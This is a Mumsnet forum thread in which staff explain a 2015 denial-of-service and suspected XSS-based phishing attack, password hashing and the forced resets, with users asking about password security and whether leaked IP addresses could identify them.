More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

@JustineMumsnet

[quote tigerscameatnight] Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

Insight data (including product testing) is kept in a different system and protected with a username/password combination which is changed regularly and set by our tech team. We have no reason to think this system was compromised.

Local data is only accessible by individual LEs or admin. Admin access was shut down last week - we don't know for sure what was accessed prior to that but we have no evidence to suggest it was.[/quote]

Update - we don't store addresses relating to local in the part of admin that was breached - they are kept elsewhere and password protected.

thank you!

although hopefully by a password better than teaandcustardcreams ...

Sorry if this has been covered already and not sure if it's relevant but have just remembered that I was PM'd on FB by my cousin, who said that my email account was apparently sending out virus links. Just checked: this was August 6th.
(I know this can happen anyway, from other sources)

Thank you - that makes sense

Thanks for the update. I was booted off again overnight and had to log in again - at least this time I was able to use my (second) complex password rather than re-set it to be able to get in. Oh well

Maryz Wed 19-Aug-15 13:43:44
I'm not particularly impressed by Justine's wording:
"no site can guarantee complete security but ultimately if you feel compromised or worried then you can and should leave because we're here to make folks easier, not the reverse."

Imagine if a bank said that...

I've be told to ask the following

What measures are in place to prevent brute force?
What is their unit test and automation test coverage of the code?
Have they undergone either blackbox or white box penetration testing?
How are passwords stored in the database? (you want encryption method, guaranteed unique and unstored salt generated by computation).

I've said I am unlikely to get answers to the above (which is gibberish to me), but I'm asking anyway. (To which I got the response that if they don't answer that, they have something to hide and a hacker would be able to guess any issues. Personally since I don't know what the above actually means, I'm not sure I can share that opinion).

My gut feeling, is that MN despite always being an obvious target have ever really taken this threat seriously enough and that's why they have had to get in outside help now in response to this, which is acting after the cart has bolted.

Yes no one is guaranteed complete security but if you are high risk / high profile you should be doing more than a lot of other sites.

Anyway my baby has just done a rather smelly shit so I need to go change his nappy and ponder my general online security and password strength.

My sympathies to MNHQ to a degree, and to anyone massively stressed out about this. I just want this resolved going forward at this point and MNHQ to learn from this and get their act together in future... as I think they were caught with their knickers firmly around their ankles on this one and should feel more embarrassed then the messages coming out of HQ seem to suggest.

RedToothBrush, DavidTech already answered upthread about the password storage, passwords are all hashed.

"We use a bcrypt hash with a modular crypt, salt of course, and a high cost to minimize the likelihood of rainbow table attacks."

I'm sure he can answer the other questions as well if/when he's not too busy fixing things.

Also not sure why you feel like you're unlikely to get any answers. Obviously there was a security hole that shouldn't have been there, but I don't get the impression that they'd just written all our passwords in crayon somewhere and blithely gone "fuck security! who cares!".

Quick question - either for MN techies, or others.

An IP address associated with my (old) account was published on "the list".

Could someone geeky in RL, who knows how to find out what my home/work IP address is, search the list and find that IP address and therefore find my (old) MN username?

RedToothBrush they are all good questions even if a bit geeky :) but geeky is cool now

the obvious reality is that no Mumsnet haven't been doing everything possible - but lets also be realistic, most websites don't - all security is a balance:

• user's responsibility v. website's responsibility
• hard for normal people to use v. easy to hack
• cost v. need

etc.

I started a list in site stuff called after the storm - suggesting in outline some of what you post - perhaps you could add those suggestions there...

it is not unreasonable to expect that security is increased after this - up to MN how much they do, but there is certainly no future excuse of not being aware of what is needed :)

You can pretty much change your IP address by switching your router off and switching it back on again, so it seems unlikely someone could both find your current IP address and match it to a previous one you used.

But what if the router has not been turned off and on again? (of course I'll do that now!)

I'm thinking not of random strangers, but spouses and DCs who know their spouse/mum has a MN account, and who check the list to see if they can find the username and have a peek at previous posts?

Given that there is some speculation that this is the work of a bitter-ex, I don't think it's that unlikely.

Is it technically possible?

IP addresses need not be specific to a particular person/address.

Some people will share an IP address (eg if you use the same internet provider. Users in a similar geographical area will share an IP address).

Some IP addresses stay the same. Some will change regularly (eg with the router being switched off or the day changing).

Some will be recycled.

It really depends on who your provider is I think. But as I say previously, I'm not a geek and my understanding is pretty limited.

Needless to say, I would not worry too much IP addresses as they are pretty useless for identifying an individual in the way you describe. This is why they can't be used to block trolls.

@wannaBe

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has leaning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

Hi wannaBe,

Thanks for the heads up, we have had a look and have no reason to believe that this is a hacked account. Thanks for the heads up and apologies for the delay.

RedToothBrush

in effect people don't share an IP address - while you are using it then the IP address does identify you / your network / your router etc. (actually you on your broadband supplier's computer)

a dynamic ip address is simply that you are allocated one from a pool each time you request one and the pool could be thousands of ip addresses - each time you turn your router off and back on, you will probably get a different one...

it is rather like a drawer of socks - you are wearing the red pair today, you can carry on wearing them for the next year - but as soon as you wash them, the next pair you pull out could be the blue pair, or the green pair... at that point someone else might pull out the red pair and wear them - but you can't both wear the red pair at the same time :)

however, to all extents and purposes - the IP address won't harm anyone... if you are worried about a spouse matching it:

• turn your router off and back on to reset it
• change your username
• change your password

no issues :)

I'm not on the list but just remembered that a couple of days ago I had a notification from Facebook saying someone had requested a reset of my FB password. Could this be linked?

"however, to all extents and purposes - the IP address won't harm anyone..."

Because, fortunately, no-one ever uses MN from work, or from a university, or has a home business with a business broadband product which has a static IP number, or uses Virgin Media whose IP addresses tend to be sticky over a long period of time....

I'm on the list and spend yesterday changing passwords for my entire life... Been following this as much as work permits but may have missed the finer points of 4000+ posts so can anyone help me out here: if my mn name and password is on the list, is there any chance that the hacker also has my rl name? I put that on my profile when I registered some 6 yrs ago and I'm very identifiable by that... I have to dereg I suppose? I like my name

Pneumometer - true some people might be on MN instead of working :) but probably not

even if the ip address is known - how is that going to help any hacker do anything exciting with it?!

lets not scare people un-necessarily...

KeepTheCarRunning If they logged into your account then they could see any information you had in there - there is no suggestion that they did this for every account, though that they might have done for a few...

As someone that was one the list, I noticed that several (including myself) didn't have passwords attached.

Do you have a suggestion as to why this would be?

Do you have a suggestion as to why this would be?

I would guess you just refreshed while on the phishing page, or hit enter without putting in password, but that your username was autocompleted?

So just luck then.

Thanks akkakk looks like a dereg might be wiser...

Akkakk. My concern isn't the hacker, I couldn't give a toss what s/he reads.

My worry is the my anonymity of the posts I made under the username that has been publicly linked to my IP address. Can someone who knows my IP address (my boss, my DC, my spouse) work out which is my username by linking it to an IP address they already know from the list?

It seems that the answer is possibly. That doesn't sit well with me.

Are MNHQ going to make provision for the complete posting histories of those usernames to be deleted if they wish?